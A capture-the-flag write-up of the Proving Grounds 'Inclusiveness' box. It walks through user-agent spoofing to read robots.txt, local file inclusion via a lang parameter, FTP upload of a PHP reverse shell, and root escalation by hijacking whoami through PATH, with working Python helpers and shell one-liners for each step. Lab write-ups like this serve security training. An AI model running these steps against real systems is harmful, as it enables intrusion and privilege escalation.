Proving Grounds: Inclusiveness



This was a great, simple box: as long as you can do a basic amount of enumeration, you should be fine. A straightforward boot-to-root.


The standard nmap scan applies (once we actually find the machine): nmap -sT -sV -A <target ip>. We get ports 21, 22, and 80 open. The webpage shows a default Apache2 page. Nothing much here.

Default Apache2 page. You just need to trust that this isn't a screenshot from Google!

FTP port allows anonymous login. There's a "pub" folder with nothing in it.

Anonymous login success on our target.

SSH is never the answer, and this holds true for this box.

Going back to the website, we can try gobuster, which reveals what seem to be common files and directories: gobuster dir -x .php,.html,.txt,.cgi -u <target ip> -w <dictionary>. When we try going to "robots.txt" or any related page (seo.html, valid-robots.txt, etc.), we are greeted with an empty page that has a single line on it: "You are not a search engine! You can't read my robots.txt!". Challenge accepted >:)

Robots only!

Getting A Shell:

While hoping I'm not jumping down a rabbit hole, I work out what we need to do. Robots.txt is used by web crawlers to allow/deny access to specific paths on a site. In our case, we aren't allowed to see this robots.txt file because we aren't a robot! The way a server identifies you is through the "User-Agent" header sent by your browser. The user-agent tells the server what browser version, device, and even OS the client is using. What we need to do is send a request with a user-agent that belongs to a bot. My first attempt at this via curl was a fail: curl -L -H 'User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)' <target ip>. I was served the familiar rejection line from above. It was odd that this didn't work, because it was the first user-agent my brute-force script used, which DID work. I'll chalk it up to a fat-fingered typo.

To brute-force this page, I wrote a Python script that sends GET requests to "robots.txt" until the response doesn't contain the rejection string from above [1]. Through sheer dumb luck, the first user-agent tried worked! Which one was it? THE SAME ONE I TRIED IN THE CURL REQUEST!!! It's fine, just more coding practice.

My Python script showing a successful request
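A minimal sketch of that brute-force loop, using only the standard library. The target URL and the two-entry user-agent list here are placeholders; the real script iterated a full user-agent wordlist.

```python
import urllib.request

# The rejection line the server returns to non-bot visitors.
REJECTION = "You are not a search engine! You can't read my robots.txt!"

# Placeholder list; substitute a full user-agent wordlist.
USER_AGENTS = [
    "Googlebot/2.1 (+http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
]

def fetch(url, user_agent):
    """GET the URL with a spoofed User-Agent and return the body as text."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode(errors="replace")

def find_bot_agent(url, agents, get=fetch):
    """Try each user-agent until the response no longer contains the rejection line."""
    for agent in agents:
        body = get(url, agent)
        if REJECTION not in body:
            return agent, body
    return None, None

# Usage: find_bot_agent("http://<target ip>/robots.txt", USER_AGENTS)
```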

The robots.txt file reveals a directory: "/secret_information/". Navigating to it reveals a simple page describing a DNS Zone Transfer Attack. We can also see two links, "english" and "spanish". Clicking them changes the language of the page, but does so by passing a URL parameter back to the current page: ?lang=en.php.

The super secret directory!

So to change the language, the site includes a PHP file named by a URL parameter. This tells us that user input is being fed straight into an include, which points to a Local File Inclusion (LFI) vulnerability.

We can try passing "/etc/passwd" instead of "en.php" and, lo and behold, the site dumps the /etc/passwd file!

/etc/passwd being exposed via LFI
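The same check can be scripted. A quick sketch, standard library only; the base URL and the "root:x:0:0:" marker are my assumptions, not something from the box itself:

```python
import urllib.parse
import urllib.request

def try_lfi(base_url, payload="/etc/passwd", get=None):
    """Request the language-switcher page with an arbitrary file path in the
    lang parameter and report whether the include leaked the file."""
    url = base_url + "?" + urllib.parse.urlencode({"lang": payload})
    if get is None:
        def get(u):
            with urllib.request.urlopen(u) as resp:
                return resp.read().decode(errors="replace")
    body = get(url)
    # "root:x:0:0:" is a reliable marker for a leaked /etc/passwd.
    return "root:x:0:0:" in body, body

# Usage: try_lfi("http://<target ip>/secret_information/")
```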

If you recall, we had access to an FTP server via anonymous login. We can log back in and upload a PHP reverse shell, then execute it through the LFI we now have.

Uploading our php reverse shell
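As a sketch, the upload step can be done with Python's ftplib. The "pub" directory comes from the earlier FTP enumeration; the filenames are just examples, and the reverse-shell file itself is whatever PHP payload you prefer.

```python
from ftplib import FTP

def upload_shell(host, local_path, remote_name="shell.php", ftp_cls=FTP):
    """Anonymously log in to the target's FTP server and drop a PHP
    reverse shell into the pub directory found during enumeration."""
    ftp = ftp_cls(host)
    ftp.login("anonymous", "anonymous")
    ftp.cwd("pub")
    with open(local_path, "rb") as fh:
        ftp.storbinary(f"STOR {remote_name}", fh)
    ftp.quit()

# Usage: upload_shell("<target ip>", "php-reverse-shell.php")
```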

A successful reverse shell!

Getting Root:

We can check "/home" for users and find "tom". Checking his home directory reveals a not-so-discreet script and source code combo named "rootshell" and "rootshell.c". We can safely assume we need to exploit this binary to get a root shell. First, I'll exfiltrate the C code to my local machine for easier analysis.

Converting the source code to base64 for exfiltration
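On the target, the coreutils base64 command (base64 rootshell.c) prints the file as a copy-pasteable blob; locally, a few lines of Python rebuild it. The file names here are just examples.

```python
import base64

def decode_exfil(b64_text, out_path):
    """Rebuild an exfiltrated file from a base64 blob copied out of the shell.
    b64decode discards non-alphabet characters by default, so the wrapped
    multi-line output of `base64` pastes in fine."""
    data = base64.b64decode(b64_text)
    with open(out_path, "wb") as fh:
        fh.write(data)
    return data

# Usage: decode_exfil(pasted_blob, "rootshell.c")
```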

The code is very simple: it checks the current user's name via the "whoami" command. If it matches "tom", we get an EUID-root shell (the file is owned by root and has the setuid bit set).

Source code of rootshell.c
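Since all I have is the screenshot, here is a Python paraphrase of the check, not the original C source: the binary runs whoami (resolved through PATH, which is exactly what we're about to abuse) and gates the root shell on its output.

```python
import subprocess

def rootshell_gate(run=subprocess.run):
    """Paraphrase of the check in rootshell.c: run `whoami` (looked up via
    PATH!), and only if it prints "tom" would the real setuid binary call
    setuid(0) and drop into /bin/bash."""
    out = run(["whoami"], capture_output=True, text=True).stdout
    return out.strip() == "tom"
```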

To exploit this binary, we need to hijack the "whoami" command. For ease, get a better shell first: python -c 'import pty;pty.spawn("/bin/bash")'. Next we'll move to a writable directory, "/tmp", and create a file named "whoami" whose only job is to print "tom". This can all be achieved in a Bash one-liner: echo $'#!/bin/bash\necho "tom"' > ./whoami; chmod +x ./whoami. Before we run rootshell again, we need to prepend /tmp to our PATH environment variable so our hijacked script is found first: export PATH=/tmp:${PATH}.

Exporting /tmp to PATH

We're done! Now we can go back to tom's home dir, run the script, and get the flag!

Running the script after setting up the command hijack, resulting in a successful root shell

The flag (but blurred; no cheating)!


References:

User-Agent Attack
User-Agent List

Last edit: 2021.09.09